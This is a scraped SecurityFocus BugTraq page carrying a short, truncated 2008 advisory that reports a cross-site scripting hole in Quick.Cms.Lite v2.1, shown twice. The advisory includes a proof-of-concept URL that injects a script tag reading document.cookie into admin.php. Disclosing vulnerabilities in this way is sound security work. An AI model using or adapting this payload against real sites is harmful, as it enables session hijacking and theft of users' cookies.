BugTraq
Back to list
Name:
Email:
*Note: Email address will appear as "user domain ext" to prevent harvesting.
Subject:
Message:
[NOBYTES.COM: #14] Quick.Cms.Lite v2.1 Freeware - Cross Site Scripting
Sep 16 2008 09:15PM
John Cobb (johnc nobytes com)
Application: Quick.Cms.Lite v2.1 Freeware
Authors Site: http://opensolution.org/quick.cms,en,10.html
+--------------------------------------------------------------+
XSS:
http://www.victim.com/admin.php?"><script>alert(document.cookie)</script
><"
+-[Notes:]-------------------------------------...
[ more ]
Privacy Statement
Copyright 2010, SecurityFocus
Authors Site: http://opensolution.org/quick.cms,en,10.html
+--------------------------------------------------------------+
XSS:
http://www.victim.com/admin.php?"><script>alert(document.cookie)</script
><"
+-[Notes:]-------------------------------------...
[ more ]